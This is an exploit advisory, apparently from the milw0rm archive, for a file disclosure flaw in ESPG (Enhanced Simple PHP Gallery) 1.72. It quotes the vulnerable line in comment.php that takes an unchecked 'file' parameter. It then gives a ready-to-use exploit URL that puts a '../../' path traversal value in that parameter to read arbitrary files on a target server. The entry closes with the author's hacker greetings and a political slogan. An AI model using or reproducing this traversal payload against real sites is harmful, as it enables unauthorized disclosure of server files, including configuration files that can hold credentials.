ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure



EKU-ID: 15662 CVE: OSVDB-51671;CVE-2009-0331 OSVDB-ID:
Author: bd0rk Published: 2009-01-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


                      .::ESPG 1.72 File Disclosure Vulnerability::.



 => Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72

 => Vendor: http://quirm.net

 => Download: http://quirm.net/download/21/

 => Bugfounder: bd0rk

 => Contact: bd0rk[at]hackermail.com

 => Greetings: str0ke, TheJT, Maria, Alucard, x0r_32

 => Vulnerable Code in comment.php line 3

            -------------------------

             $fileid = $_GET['file'];

            -------------------------



[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php


                  ###The 20 years old, german Hacker bd0rk###


                     => 'GAINST WAR IN ISRAEL AND GAZA!!! <=

# milw0rm.com [2009-01-18]